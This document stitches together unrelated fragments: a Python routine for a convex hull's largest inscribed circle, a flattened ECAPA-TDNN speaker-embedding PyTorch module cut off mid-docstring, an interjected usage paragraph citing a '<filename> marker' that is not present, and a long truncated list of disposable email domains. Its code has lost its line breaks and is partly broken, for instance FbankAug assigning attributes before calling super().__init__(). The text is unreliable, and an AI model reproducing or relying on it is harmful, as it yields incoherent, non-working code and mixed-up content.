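    # hull.equations rows are [a_x, a_y, c] with a.x + c <= 0 for interior points
    A = hull.equations[:, :2]
    b = -hull.equations[:, 2]
    norms = np.linalg.norm(A, axis=1)
    # Variables are (xc_x, xc_y, R); maximising R means minimising -R.
    res = linprog(c=[0.0, 0.0, -1.0],
                  A_ub=np.hstack([A, norms[:, None]]),
                  b_ub=b,
                  bounds=[(None, None), (None, None), (0, None)])
    return res.x[2] if res.success else np.nan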
# models/ECAPA_TDNN.py import torch # noqa: F401 import torch.nn as nn import torch.nn.functional as F from models.ECAPA_utils import Conv1d as _Conv1d from models.ECAPA_utils import BatchNorm1d as _BatchNorm1d from utils import PreEmphasis import torchaudio class FbankAug(nn.Module): def __init__(self, freq_mask_width = (0, 8), time_mask_width = (0, 10)): self.time_mask_width = time_mask_width self.freq_mask_width = freq_mask_width super().__init__() def mask_along_axis(self, x, dim): original_size = x.shape batch, fea, time = x.shape if dim == 1: D = fea width_range = self.freq_mask_width else: D = time width_range = self.time_mask_width mask_len = torch.randint(width_range[0], width_range[1], (batch, 1), device=x.device).unsqueeze(2) mask_pos = torch.randint(0, max(1, D - mask_len.max()), (batch, 1), device=x.device).unsqueeze(2) arange = torch.arange(D, device=x.device).view(1, 1, -1) mask = (mask_pos <= arange) * (arange < (mask_pos + mask_len)) mask = mask.any(dim=1) if dim == 1: mask = mask.unsqueeze(2) else: mask = mask.unsqueeze(1) x = x.masked_fill_(mask, 0.0) return x.view(*original_size) def forward(self, x): x = self.mask_along_axis(x, dim=2) x = self.mask_along_axis(x, dim=1) return x def length_to_mask(length, max_len=None, dtype=None, device=None): """Creates a binary mask for each sequence. Reference: https://discuss.pytorch.org/t/how-to-generate-variable-length-mask/23397/3 Arguments --------- length : torch.LongTensor Containing the length of each sequence in the batch. Must be 1D. max_len : int Max length for the mask, also the size of the second dimension. dtype : torch.dtype, default: None The dtype of the generated mask. device: torch.device, default: None The device to put the mask variable. Returns ------- mask : tensor The binary mask. Example ------- >>> length=torch.Tensor([1,2,3]) >>> mask=length_to_mask(length) >>> mask tensor([[1., 0., 0.], [1., 1., 0.], [1., 1., 1.]]) """ assert len(length.shape) == 1 if max_len is None: max_len = length.max().long().item() # using arange to generate mask mask = torch.arange( max_len, device=length.device, dtype=length.dtype ).expand(len(length), max_len) < length.unsqueeze(1) if dtype is None: dtype = length.dtype if device is None: device = length.device mask = torch.as_tensor(mask, dtype=dtype, device=device) return mask # Skip transpose as much as possible for efficiency class Conv1d(_Conv1d): def __init__(self, *args, **kwargs): super().__init__(skip_transpose=True, *args, **kwargs) class BatchNorm1d(_BatchNorm1d): def __init__(self, *args, **kwargs): super().__init__(skip_transpose=True, *args, **kwargs) class TDNNBlock(nn.Module): """An implementation of TDNN. Arguments ---------- in_channels : int Number of input channels. out_channels : int The number of output channels. kernel_size : int The kernel size of the TDNN blocks. dilation : int The dilation of the Res2Net block. activation : torch class A class for constructing the activation layers.
Example ------- >>> inp_tensor = torch.rand([8, 120, 64]).transpose(1, 2) >>> layer = TDNNBlock(64, 64, kernel_size=3, dilation=1) >>> out_tensor = layer(inp_tensor).transpose(1, 2) >>> out_tensor.shape torch.Size([8, 120, 64]) """ def __init__( self, in_channels, out_channels, kernel_size, dilation, activation=nn.ReLU, ): super(TDNNBlock, self).__init__() self.conv = Conv1d( in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, dilation=dilation, ) self.activation = activation() self.norm = BatchNorm1d(input_size=out_channels) def forward(self, x): return self.norm(self.activation(self.conv(x))) class Res2NetBlock(torch.nn.Module): """An implementation of Res2NetBlock w/ dilation. Arguments --------- in_channels : int The number of channels expected in the input. out_channels : int The number of output channels. scale : int The scale of the Res2Net block. kernel_size: int The kernel size of the Res2Net block. dilation : int The dilation of the Res2Net block. Example ------- >>> inp_tensor = torch.rand([8, 120, 64]).transpose(1, 2) >>> layer = Res2NetBlock(64, 64, scale=4, dilation=3) >>> out_tensor = layer(inp_tensor).transpose(1, 2) >>> out_tensor.shape torch.Size([8, 120, 64]) """ def __init__( self, in_channels, out_channels, scale=8, kernel_size=3, dilation=1 ): super(Res2NetBlock, self).__init__() assert in_channels % scale == 0 assert out_channels % scale == 0 in_channel = in_channels // scale hidden_channel = out_channels // scale self.blocks = nn.ModuleList( [ TDNNBlock( in_channel, hidden_channel, kernel_size=kernel_size, dilation=dilation, ) for i in range(scale - 1) ] ) self.scale = scale def forward(self, x): y = [] for i, x_i in enumerate(torch.chunk(x, self.scale, dim=1)): if i == 0: y_i = x_i elif i == 1: y_i = self.blocks[i - 1](x_i) else: y_i = self.blocks[i - 1](x_i + y_i) y.append(y_i) y = torch.cat(y, dim=1) return y class SEBlock(nn.Module): """An implementation of squeeze-and-excitation block. Arguments --------- in_channels : int The number of input channels. se_channels : int The number of output channels after squeeze. out_channels : int The number of output channels. Example ------- >>> inp_tensor = torch.rand([8, 120, 64]).transpose(1, 2) >>> se_layer = SEBlock(64, 16, 64) >>> lengths = torch.rand((8,)) >>> out_tensor = se_layer(inp_tensor, lengths).transpose(1, 2) >>> out_tensor.shape torch.Size([8, 120, 64]) """ def __init__(self, in_channels, se_channels, out_channels): super(SEBlock, self).__init__() self.conv1 = Conv1d( in_channels=in_channels, out_channels=se_channels, kernel_size=1 ) self.relu = torch.nn.ReLU(inplace=True) self.conv2 = Conv1d( in_channels=se_channels, out_channels=out_channels, kernel_size=1 ) self.sigmoid = torch.nn.Sigmoid() def forward(self, x, lengths=None): L = x.shape[-1] if lengths is not None: mask = length_to_mask(lengths * L, max_len=L, device=x.device) mask = mask.unsqueeze(1) total = mask.sum(dim=2, keepdim=True) s = (x * mask).sum(dim=2, keepdim=True) / total else: s = x.mean(dim=2, keepdim=True) s = self.relu(self.conv1(s)) s = self.sigmoid(self.conv2(s)) return s * x class AttentiveStatisticsPooling(nn.Module): """This class implements an attentive statistic pooling layer for each channel. It returns the concatenated mean and std of the input tensor. Arguments --------- channels: int The number of input channels. attention_channels: int The number of attention channels. 
Example ------- >>> inp_tensor = torch.rand([8, 120, 64]).transpose(1, 2) >>> asp_layer = AttentiveStatisticsPooling(64) >>> lengths = torch.rand((8,)) >>> out_tensor = asp_layer(inp_tensor, lengths).transpose(1, 2) >>> out_tensor.shape torch.Size([8, 1, 128]) """ def __init__(self, channels, attention_channels=128, global_context=True): super().__init__() self.eps = 1e-12 self.global_context = global_context if global_context: self.tdnn = TDNNBlock(channels * 3, attention_channels, 1, 1) else: self.tdnn = TDNNBlock(channels, attention_channels, 1, 1) self.tanh = nn.Tanh() self.conv = Conv1d( in_channels=attention_channels, out_channels=channels, kernel_size=1 ) def forward(self, x, lengths=None): """Calculates mean and std for a batch (input tensor). Arguments --------- x : torch.Tensor Tensor of shape [N, C, L]. """ L = x.shape[-1] def _compute_statistics(x, m, dim=2, eps=self.eps): mean = (m * x).sum(dim) std = torch.sqrt( (m * (x - mean.unsqueeze(dim)).pow(2)).sum(dim).clamp(eps) ) return mean, std if lengths is None: lengths = torch.ones(x.shape[0], device=x.device) # Make binary mask of shape [N, 1, L] mask = length_to_mask(lengths * L, max_len=L, device=x.device) mask = mask.unsqueeze(1) # Expand the temporal context of the pooling layer by allowing the # self-attention to look at global properties of the utterance. if self.global_context: # torch.std is unstable for backward computation # https://github.com/pytorch/pytorch/issues/4320 total = mask.sum(dim=2, keepdim=True).float() mean, std = _compute_statistics(x, mask / total) mean = mean.unsqueeze(2).repeat(1, 1, L) std = std.unsqueeze(2).repeat(1, 1, L) attn = torch.cat([x, mean, std], dim=1) else: attn = x # Apply layers attn = self.conv(self.tanh(self.tdnn(attn))) # Filter out zero-paddings attn = attn.masked_fill(mask == 0, float("-inf")) attn = F.softmax(attn, dim=2) mean, std = _compute_statistics(x, attn) # Append mean and std of the batch pooled_stats = torch.cat((mean, std), dim=1) pooled_stats = pooled_stats.unsqueeze(2) return pooled_stats class SERes2NetBlock(nn.Module): """An implementation of building block in ECAPA-TDNN, i.e., TDNN-Res2Net-TDNN-SEBlock. Arguments ---------- out_channels: int The number of output channels. res2net_scale: int The scale of the Res2Net block. kernel_size: int The kernel size of the TDNN blocks. dilation: int The dilation of the Res2Net block. activation : torch class A class for constructing the activation layers. 
Example ------- >>> x = torch.rand(8, 120, 64).transpose(1, 2) >>> conv = SERes2NetBlock(64, 64, res2net_scale=4) >>> out = conv(x).transpose(1, 2) >>> out.shape torch.Size([8, 120, 64]) """ def __init__( self, in_channels, out_channels, res2net_scale=8, se_channels=128, kernel_size=1, dilation=1, activation=torch.nn.ReLU, ): super().__init__() self.out_channels = out_channels self.tdnn1 = TDNNBlock( in_channels, out_channels, kernel_size=1, dilation=1, activation=activation, ) self.res2net_block = Res2NetBlock( out_channels, out_channels, res2net_scale, kernel_size, dilation ) self.tdnn2 = TDNNBlock( out_channels, out_channels, kernel_size=1, dilation=1, activation=activation, ) self.se_block = SEBlock(out_channels, se_channels, out_channels) self.shortcut = None if in_channels != out_channels: self.shortcut = Conv1d( in_channels=in_channels, out_channels=out_channels, kernel_size=1, ) def forward(self, x, lengths=None): residual = x if self.shortcut: residual = self.shortcut(x) x = self.tdnn1(x) x = self.res2net_block(x) x = self.tdnn2(x) x = self.se_block(x, lengths) return x + residual class ECAPA_TDNN(torch.nn.Module): """An implementation of the speaker embedding model in a paper. "ECAPA-TDNN: Emphasized Channel Attention, Propagation and Aggregation in TDNN Based Speaker Verification" (https://arxiv.org/abs/2005.07143). Arguments --------- device : str Device used, e.g., "cpu" or "cuda". activation : torch class A class for constructing the activation layers. channels : list of ints Output channels for TDNN/SERes2Net layer. kernel_sizes : list of ints List of kernel sizes for each layer. dilations : list of ints List of dilations for kernels in each layer. lin_neurons
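FbankAug above is the only block in this file without a doctest-style example. The following is a minimal usage sketch; the import path is taken from the <filename> marker, and the shapes (4 utterances, 80 mel bins, 200 frames) are illustrative assumptions, not values from the source.

```python
# Minimal usage sketch for the FbankAug defined above; the shapes
# (4 utterances, 80 mel bins, 200 frames) are illustrative assumptions.
import torch
from models.ECAPA_TDNN import FbankAug  # assumed import path, per the <filename> marker above

aug = FbankAug(freq_mask_width=(0, 8), time_mask_width=(0, 10))
feats = torch.randn(4, 80, 200)   # [batch, n_mels, frames]
masked = aug(feats)               # same shape; random freq/time bands zeroed
print(masked.shape)               # torch.Size([4, 80, 200])
```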
"umy.kr", "uncond.us", "undeva.net", "unicorntoday.com", "unicredit.tk", "unif8nthemsmnp.cf", "unif8nthemsmnp.ga", "unif8nthemsmnp.gq", "unif8nthemsmnp.ml", "unif8nthemsmnp.tk", "unite.cloudns.asia", "unixproject.ru", "unmail.ru", "unpastore.co", "unseen.eu", "uny.kr", "uo8fylspuwh9c.cf", "uo8fylspuwh9c.ga", "uo8fylspuwh9c.gq", "uo8fylspuwh9c.ml", "uo8fylspuwh9c.tk", "uojjhyhih.cf", "uojjhyhih.ga", "uojjhyhih.gq", "uojjhyhih.ml", "upak-vakuum.ru", "upakologiya.ru", "upbrellastore.ru", "updates9z.com", "upetreal.ru", "upf7qtcvyeev.cf", "upf7qtcvyeev.ga", "upf7qtcvyeev.gq", "upf7qtcvyeev.tk", "upgcsjy.com", "uphomail.ga", "uplay-store.ru", "upliftnow.com", "uplipht.com", "upozowac.info", "uprsoft.ru", "upskirtscr.com", "uptodate.tech", "upy.kr", "uqcgga04i1gfbqf.cf", "uqcgga04i1gfbqf.ga", "uqcgga04i1gfbqf.gq", "uqcgga04i1gfbqf.ml", "uqcgga04i1gfbqf.tk", "uqghq6tvq1p8c56.cf", "uqghq6tvq1p8c56.ga", "uqghq6tvq1p8c56.gq", "uqghq6tvq1p8c56.ml", "uqghq6tvq1p8c56.tk", "uqxcmcjdvvvx32.cf", "uqxcmcjdvvvx32.ga", "uqxcmcjdvvvx32.gq", "uqxcmcjdvvvx32.ml", "uqxcmcjdvvvx32.tk", "uralmaxx.ru", "uralplay.ru", "uralsk-airport.ru", "urbanstudios.online", "urchatz.ga", "uredemail.com", "ureee.us", "urfey.com", "urfunktion.se", "urhen.com", "urlina.ru", "urltc.com", "uroid.com", "uroki-logopeda.ru", "urotrin-supershop.ru", "urotrin62.ru", "urotrinium.ru", "urotrinz-supershop.ru", "uruarurqup5ri9s28ki.cf", "uruarurqup5ri9s28ki.ga", "uruarurqup5ri9s28ki.gq", "uruarurqup5ri9s28ki.ml", "uruarurqup5ri9s28ki.tk", "us.dlink.cf", "us.dlink.gq", "us.to", "usa-gov.cf", "usa-gov.ga", "usa-gov.gq", "usa-gov.ml", "usa-gov.tk", "usa.cc", "usa.isgre.at", "usa623.gq", "usachan.cf", "usachan.gq", "usachan.ml", "usactive.ru", "usaf.dmtc.press", "usako.be", "usako.net", "uscaves.com", "used-product.fr", "usemail.xyz", "usenetmail.tk", "users.idbloc.co", "userseo.ga", "usharingk.com", "ushijima1129.cf", "ushijima1129.ga", "ushijima1129.gq", "ushijima1129.ml", "ushijima1129.tk", "usiaj.com", "usitv.ga", "usn-dlya-ipe.ru", "ussv.club", "ustins.ru", "usurpator.ru", "ut6rtiy1ajr.ga", "ut6rtiy1ajr.gq", "ut6rtiy1ajr.ml", "ut6rtiy1ajr.tk", "utangsss.online", "utc7xrlttynuhc.cf", "utc7xrlttynuhc.ga", "utc7xrlttynuhc.gq", "utc7xrlttynuhc.ml", "utc7xrlttynuhc.tk", "utilities-online.info", "utilitservis.ru", "utoo.email", "utooemail.com", "uttoymdkyokix6b3.cf", "uttoymdkyokix6b3.ga", "uttoymdkyokix6b3.gq", "uttoymdkyokix6b3.ml", "uttoymdkyokix6b3.tk", "uttvgar633r.cf", "uttvgar633r.ga", "uttvgar633r.gq", "uttvgar633r.ml", "uttvgar633r.tk", "utwevq886bwc.cf", "utwevq886bwc.ga", "utwevq886bwc.gq", "utwevq886bwc.ml", "utwevq886bwc.tk", "uu.gl", "uu2.ovh", "uurksjb7guo0.cf", "uurksjb7guo0.ga", "uurksjb7guo0.gq", "uurksjb7guo0.ml", "uurksjb7guo0.tk", "uuroalaldoadkgk058.cf", "uvelichenie-grudi-kak.ru", "uvelichit-grud.ru", "uvidetsmotret.ru", "uvy.kr", "uvyuviyopi.cf", "uvyuviyopi.ga", "uvyuviyopi.gq", "uvyuviyopi.ml", "uvyuviyopi.tk", "uw5t6ds54.com", "uwillsuc.pw", "uwork4.us", "ux.dob.jp", "ux.uk.to", "uxs14gvxcmzu.cf", "uxs14gvxcmzu.ga", "uxs14gvxcmzu.gq", "uxs14gvxcmzu.ml", "uxs14gvxcmzu.tk", "uydagdmzsc.cf", "uydagdmzsc.ga", "uydagdmzsc.gq", "uydagdmzsc.ml", "uydagdmzsc.tk", "uyp5qbqidg.cf", "uyp5qbqidg.ga", "uyp5qbqidg.gq", "uyp5qbqidg.ml", "uyp5qbqidg.tk", "uyu.kr", "uyx3rqgaghtlqe.cf", "uyx3rqgaghtlqe.ga", "uyx3rqgaghtlqe.gq", "uyx3rqgaghtlqe.ml", "uyx3rqgaghtlqe.tk", "uz6tgwk.com", "uzgrthjrfr4hdyy.gq", "uzrip.com", "uzxia.cf", "uzxia.com", "uzxia.ga", "uzxia.gq", "uzxia.ml", "uzxia.tk", "v-mail.xyz", "v.0v.ro", "v.jsonp.ro", 
"v.olvos90.tk", "v00qy9qx4hfmbbqf.cf", "v00qy9qx4hfmbbqf.ga", "v00qy9qx4hfmbbqf.gq", "v00qy9qx4hfmbbqf.ml", "v00qy9qx4hfmbbqf.tk", "v0domwwkbyzh1vkgz.cf", "v0domwwkbyzh1vkgz.ga", "v0domwwkbyzh1vkgz.gq", "v0domwwkbyzh1vkgz.ml", "v0domwwkbyzh1vkgz.tk", "v21.me.uk", "v27hb4zrfc.cf", "v27hb4zrfc.ga", "v27hb4zrfc.gq", "v27hb4zrfc.ml", "v27hb4zrfc.tk", "v3bsb9rs4blktoj.cf", "v3bsb9rs4blktoj.ga", "v3bsb9rs4blktoj.gq", "v3bsb9rs4blktoj.ml", "v3bsb9rs4blktoj.tk", "v4gdm4ipndpsk.cf", "v4gdm4ipndpsk.ga", "v4gdm4ipndpsk.gq", "v4gdm4ipndpsk.ml", "v4gdm4ipndpsk.tk", "v58tk1r6kp2ft01.cf", "v58tk1r6kp2ft01.ga", "v58tk1r6kp2ft01.gq", "v58tk1r6kp2ft01.ml", "v58tk1r6kp2ft01.tk", "v6iexwlhb6n2hf.ga", "v6iexwlhb6n2hf.gq", "v6iexwlhb6n2hf.ml", "v6iexwlhb6n2hf.tk", "v7ecub.com", "va5vsqerkpmsgibyk.cf", "va5vsqerkpmsgibyk.ga", "va5vsqerkpmsgibyk.gq", "va5vsqerkpmsgibyk.ml", "va5vsqerkpmsgibyk.tk", "vaasfc4.tk", "vacancydom.ru", "vacwdlenws604.ml", "vadlag.xyz", "vagsuerokgxim1inh.cf", "vagsuerokgxim1inh.ga", "vagsuerokgxim1inh.gq", "vagsuerokgxim1inh.ml", "vagsuerokgxim1inh.tk", "vaik.cf", "vaik.ga", "vaik.gq", "vaik.ml", "vaik.tk", "vajq8t6aiul.cf", "vajq8t6aiul.ga", "vajq8t6aiul.gq", "vajq8t6aiul.ml", "vajq8t6aiul.tk", "valemail.net", "valentinagrib.ru", "valhalladev.com", "valyutniy-kontrol.ru", "vampresent.ru", "vanbil.tk", "vanhoangtn1.ga", "vanhoangtn1.ooo", "vanhoangtn1.us", "vapecentral.ru", "vapetaxi.ru", "variouscraft.ru", "vash--mishka.ru", "vaultsophia.com", "vaultsophiaonline.com", "vay.kr", "vba.kr", "vbalakovo.ru", "vbha0moqoig.ga", "vbha0moqoig.ml", "vbha0moqoig.tk", "vcbmail.ga", "vcghv0eyf3fr.cf", "vcghv0eyf3fr.ga", "vcghv0eyf3fr.gq", "vcghv0eyf3fr.ml", "vcghv0eyf3fr.tk", "vcticngsh5.ml", "vdmmhozx5kxeh.cf", "vdmmhozx5kxeh.ga", "vdmmhozx5kxeh.gq", "vdmmhozx5kxeh.ml", "vdmmhozx5kxeh.tk", "vdobromzdravyy.ru", "vdomemilo.ru", "ve8zum01pfgqvm.cf", "ve8zum01pfgqvm.ga", "ve8zum01pfgqvm.gq", "ve8zum01pfgqvm.ml", "ve8zum01pfgqvm.tk", "ve9xvwsmhks8wxpqst.cf", "ve9xvwsmhks8wxpqst.ga", "ve9xvwsmhks8wxpqst.gq", "ve9xvwsmhks8wxpqst.ml", "ve9xvwsmhks8wxpqst.tk", "veanlo.com", "vedmail.com", "vedula.com", "veebee.cf", "veebee.ga", "veebee.gq", "veebee.ml", "veebee.tk", "vefspchlzs2qblgoodf.ga", "vefspchlzs2qblgoodf.ml", "vefspchlzs2qblgoodf.tk", "vehicle-blackbox-dvr.ru", "vektik.com", "veldmail.ga", "velosegway.ru", "velosiped-go.ru", "vemomail.win", "veneersofficial.ru", "veneersperfectsmile.ru", "venompen.com", "veo.kr", "ver0.cf", "ver0.ga", "ver0.gq", "ver0.ml", "ver0.tk", "verbee.ru", "vercelli.cf", "vercelli.ga", "vercelli.gq", "vercelli.ml", "verifymail.cf", "verifymail.ga", "verifymail.gq", "verifymail.ml", "verifymail.win", "verisign.cf", "verisign.ga", "verisign.gq", "verizondw.com", "vernipay.ru", "vernivychet.ru", "vernz.cf", "vernz.ga", "vernz.gq", "vernz.ml", "vernz.tk", "veronateam.ru", "verossa-rp.ru", "veryday.ch", "veryday.eu", "veryday.info", "veryprice.co", "veryrealemail.com", "vestimed.ru", "vestnikao.ru", "vestniktm.ru", "vettery.cf", "vettery.gq", "vettery.ml", "vettery.tk", "vezdehod-rent.ru", "vfemail.net", "vfienvtua2dlahfi7.cf", "vfienvtua2dlahfi7.ga", "vfienvtua2dlahfi7.gq", "vfienvtua2dlahfi7.ml", "vfienvtua2dlahfi7.tk", "vfj9g3vcnj7kadtty.cf", "vfj9g3vcnj7kadtty.ga", "vfj9g3vcnj7kadtty.gq", "vfj9g3vcnj7kadtty.ml", "vfj9g3vcnj7kadtty.tk", "vgamers.win", "vgdbankrotstvo.ru", "vgsreqqr564.cf", "vgsreqqr564.ga", "vgsreqqr564.gq", "vgsreqqr564.ml", "vgsreqqr564.tk", "vhan.tech", "vhglvi6o.com", "vhntp15yadrtz0.cf", "vhntp15yadrtz0.ga", "vhntp15yadrtz0.gq", "vhntp15yadrtz0.ml", 
"vhntp15yadrtz0.tk", "via.tokyo.jp", "vibi4f1pc2xjk.cf", "vibi4f1pc2xjk.ga", "vibi4f1pc2xjk.gq", "vibi4f1pc2xjk.ml", "vibi4f1pc2xjk.tk", "vickaentb.tk", "vidchart.com", "video-dlj-tebya.ru", "videocorporation.ru", "videohd-clip.ru", "videoprosmotr.ru", "videotubegames.ru", "viditag.com", "vidoc.ru", "vieebee.cf", "vieebee.ga", "vieebee.gq", "vieebee.tk", "vienna.cf", "viewcastmedia.com", "viewcastmedia.net", "viewcastmedia.org", "vikaslin-ruraten.ru", "vikikredit.ru", "vikingsonly.com", "viktorina-2018.ru", "viktorkedrovskiy.ru", "vikylov.ru", "villabhj.com", "vilnapresa.com", "vimi-kan.ru", "vincenza1818.site", "vinernet.com", "vinsmoke.tech", "vip-clicker.ru", "vip-lovemagic.ru", "vip-mail.ml", "vip.aiot.eu.org", "vip.cool", "vip.dmtc.press", "vip.hstu.eu.org", "vipepe.com", "viphone.eu.org", "viphop.ru", "viplinz.ru", "viplovemagic.ru", "vipmagi.ru", "vipshkatulki.ru", "viptupperware.ru", "viral-science.fun", "viralhits.org", "virgilio.ga", "virgilio.gq", "virgilio.ml", "virgiliomail.cf", "virgiliomail.ga", "virgiliomail.gq", "virgiliomail.ml", "virgiliomail.tk", "virginsrus.xyz", "virtual-email.com", "virtualmail.gq", "virtznakomstva.ru", "visa-securepay.cf", "visa-securepay.ga", "visa-securepay.gq", "visa-securepay.ml", "visa-securepay.tk", "visa159.ru", "visal007.tk", "visal168.cf", "visal168.ga", "visal168.gq", "visal168.ml", "visal168.tk", "visantia.ru", "visit24.ru", "visitingob.com", "vistore.co", "viwsala.com", "vixletdev.com", "vk-comm.ru", "vkcode.ru", "vkhotkevich.ru", "vkinomax.ru", "vkusnosam.ru", "vkusnyj-recept-foto.ru", "vkusup.ru", "vkvhod.ru", "vl-pla.ru", "vl2ivlyuzopeawoepx.cf", "vl2ivlyuzopeawoepx.ga", "vl2ivlyuzopeawoepx.gq", "vl2ivlyuzopeawoepx.ml", "vl2ivlyuzopeawoepx.tk", "vlipbttm9p37te.cf", "vlipbttm9p37te.ga", "vlipbttm9p37te.gq", "vlipbttm9p37te.ml", "vlipbttm9p37te.tk", "vlivki.ru", "vlsca8nrtwpcmp2fe.cf", "vlsca8nrtwpcmp2fe.ga", "vlsca8nrtwpcmp2fe.gq", "vlsca8nrtwpcmp2fe.ml", "vlsca8nrtwpcmp2fe.tk", "vlstwoclbfqip.cf", "vlstwoclbfqip.ga", "vlstwoclbfqip.gq", "vlstwoclbfqip.ml", "vlstwoclbfqip.tk", "vmail.tech", "vmani.com", "vmentorgk.com", "vmhdisfgxxqoejwhsu.cf", "vmhdisfgxxqoejwhsu.ga", "vmhdisfgxxqoejwhsu.gq", "vmhdisfgxxqoejwhsu.ml", "vmhdisfgxxqoejwhsu.tk", "vmlfwgjgdw2mqlpc.cf", "vmlfwgjgdw2mqlpc.ga", "vmlfwgjgdw2mqlpc.ml", "vmlfwgjgdw2mqlpc.tk", "vmpanda.com", "vn92wutocpclwugc.cf", "vn92wutocpclwugc.ga", "vn92wutocpclwugc.gq", "vn92wutocpclwugc.ml", "vn92wutocpclwugc.tk", "vnedorognik-yeti.ru", "vnedu.me", "vnshare.info", "vodgard.ru", "void.maride.cc", "volkswagen-ag.cf", "volkswagen-ag.ga", "volkswagen-ag.gq", "volkswagen-ag.ml", "volkswagen-ag.tk", "voltaer.com", "volvo-ab.cf", "volvo-ab.ga", "volvo-ab.gq", "volvo-ab.ml", "volvo-ab.tk", "volvo-s60.cf", "volvo-s60.ga", "volvo-s60.gq", "volvo-s60.ml", "volvo-s60.tk", "volvo-v40.ml", "volvo-v40.tk", "volvogroup.ga", "volvogroup.gq", "volvogroup.ml", "volvogroup.tk", "volvopenta.tk", "vomoto.com", "vonbe.tk", "vorga.org", "vospitanievovrema.ru", "votiputox.org", "vouk.cf", "vouk.gq", "vouk.ml", "vouk.tk", "vozmi-instrument.ru", "vp.ycare.de", "vpfbattle.com", "vphnfuu2sd85w.cf", "vphnfuu2sd85w.ga", "vphnfuu2sd85w.gq", "vphnfuu2sd85w.ml", "vphnfuu2sd85w.tk", "vpidcvzfhfgxou.cf", "vpidcvzfhfgxou.ga", "vpidcvzfhfgxou.gq", "vpidcvzfhfgxou.ml", "vpidcvzfhfgxou.tk", "vpn33.top", "vpomosmame.ru", "vprice.co", "vps30.com", "vps911.net", "vpscloudvntoday.com", "vpslists.com", "vpsmobilecloudkb.com", "vpsorg.pro", "vpsorg.top", "vpstraffic.com", "vr4x4.ru", "vr5gpowerv.com", "vradportal.com", 
"vremonte24-store.ru", "vrgwkwab2kj5.cf", "vrgwkwab2kj5.ga", "vrgwkwab2kj5.gq", "vrgwkwab2kj5.ml", "vrgwkwab2kj5.tk", "vrloco.com", "vrou.cf", "vrou.ga", "vrou.gq", "vrou.ml", "vrou.tk", "vrpitch.com", "vs3ir4zvtgm.cf", "vs3ir4zvtgm.ga", "vs3ir4zvtgm.gq", "vs3ir4zvtgm.ml", "vs3ir4zvtgm.tk", "vs904a6.com", "vse-dveriru.ru", "vse-oboiru.ru", "vse-polyru.ru", "vse-smi.ru", "vse-zamkiru.ru", "vsedirect.ru", "vsedveriru.ru", "vsegirect.ru", "vsemsoft.ru", "vseoboiru.ru", "vseoneyrosisteme7.ru", "vsepolyru.ru", "vsevnovosti.ru", "vsezamkiru.ru", "vssms.com", "vstartup4q.com", "vt0uhhsb0kh.cf", "vt0uhhsb0kh.ga", "vt0uhhsb0kh.gq", "vt0uhhsb0kh.ml", "vt0uhhsb0kh.tk", "vt8khiiu9xneq.cf", "vt8khiiu9xneq.ga", "vt8khiiu9xneq.gq", "vt8khiiu9xneq.ml", "vt8khiiu9xneq.tk", "vt8zilugrvejbs.tk", "vteachesb.com", "vteensp.com", "vtxmail.us", "vu981s5cexvp.cf", "vu981s5cexvp.ga", "vu981s5cexvp.gq", "vu981s5cexvp.ml", "vubby.com", "vuiy.pw", "vutdrenaf56aq9zj68.cf", "vutdrenaf56aq9zj68.ga", "vutdrenaf56aq9zj68.gq", "vutdrenaf56aq9zj68.ml", "vutdrenaf56aq9zj68.tk", "vuv9hhstrxnjkr.cf", "vuv9hhstrxnjkr.ga", "vuv9hhstrxnjkr.gq", "vuv9hhstrxnjkr.ml", "vuv9hhstrxnjkr.tk", "vuzimir.cf", "vvb3sh5ie0kgujv3u7n.cf", "vvb3sh5ie0kgujv3u7n.ga", "vvb3sh5ie0kgujv3u7n.gq", "vvb3sh5ie0kgujv3u7n.ml", "vvb3sh5ie0kgujv3u7n.tk", "vvlvmrutenfi1udh.ga", "vvlvmrutenfi1udh.ml", "vvlvmrutenfi1udh.tk", "vvng8xzmv2.cf", "vvng8xzmv2.ga", "vvng8xzmv2.gq", "vvng8xzmv2.ml", "vvng8xzmv2.tk", "vvv.sytes.net", "vvx046q.com", "vw-ag.tk", "vw-audi.ml", "vw-cc.cf", "vw-cc.ga", "vw-cc.gq", "vw-cc.ml", "vw-cc.tk", "vw-eos.cf", "vw-eos.ga", "vw-eos.gq", "vw-eos.ml", "vw-eos.tk", "vw-seat.ml", "vw-skoda.ml", "vwtedx7d7f.cf", "vwtedx7d7f.ga", "vwtedx7d7f.gq", "vwtedx7d7f.ml", "vwtedx7d7f.tk", "vxqt4uv19oiwo7p.cf", "vxqt4uv19oiwo7p.ga", "vxqt4uv19oiwo7p.gq", "vxqt4uv19oiwo7p.ml", "vxqt4uv19oiwo7p.tk", "vyhade3z.gq", "vykupavto1.ru", "vyrski4nwr5.cf", "vyrski4nwr5.ga", "vyrski4nwr5.gq", "vyrski4nwr5.ml", "vyrski4nwr5.tk", "vzlom4ik.tk", "vzyat-ssudy.ru", "w-amst.ru", "w-asertun.ru", "w.0w.ro", "w22fe21.com", "w3mailbox.com", "w3windsor.com", "w4i3em6r.com", "w4ms.ga", "w4ms.ml", "w5gpurn002.cf", "w5gpurn002.ga", "w5gpurn002.gq", "w5gpurn002.ml", "w5gpurn002.tk", "w634634.ga", "w656n4564.cf", "w656n4564.ga", "w656n4564.gq", "w656n4564.ml", "w656n4564.tk", "w70ptee1vxi40folt.cf", "w70ptee1vxi40folt.ga", "w70ptee1vxi40folt.gq", "w70ptee1vxi40folt.ml", "w70ptee1vxi40folt.tk", "w7wdhuw9acdwy.cf", "w7wdhuw9acdwy.ga", "w7wdhuw9acdwy.gq", "w7wdhuw9acdwy.ml", "w7wdhuw9acdwy.tk", "w918bsq.com", "w9y9640c.com", "wa010.com", "wadawdawd.ru", "wagfused.com", "wailo.cloudns.asia", "waitingjwo.com", "wajikethanh96ger.gq", "wakingupesther.com", "walala.org", "waldemar.ru", "walkmail.net", "walkmail.ru", "wanko.be", "want2lov.us", "wantplay.site", "wapl.ga", "wapyello.gq", "warau-kadoni.com", "warnednl2.com", "warungku.me", "wasabi-75.ru", "wasd.dropmail.me", "waskitacorp.cf", "waskitacorp.ga", "waskitacorp.gq", "waskitacorp.ml", "waskitacorp.tk", "wasse-asxzer.ru", "watashiyuo.cf", "watashiyuo.ga", "watashiyuo.gq", "watashiyuo.ml", "watashiyuo.tk", "watchofficial.ru", "wavesplatfom.ru", "wavesplotform.ru", "wazabi.club", "wca.cn.com", "wcddvezl974tnfpa7.cf", "wcddvezl974tnfpa7.ga", "wcddvezl974tnfpa7.gq", "wcddvezl974tnfpa7.ml", "wcddvezl974tnfpa7.tk", "wchatz.ga", "wd0payo12t8o1dqp.cf", 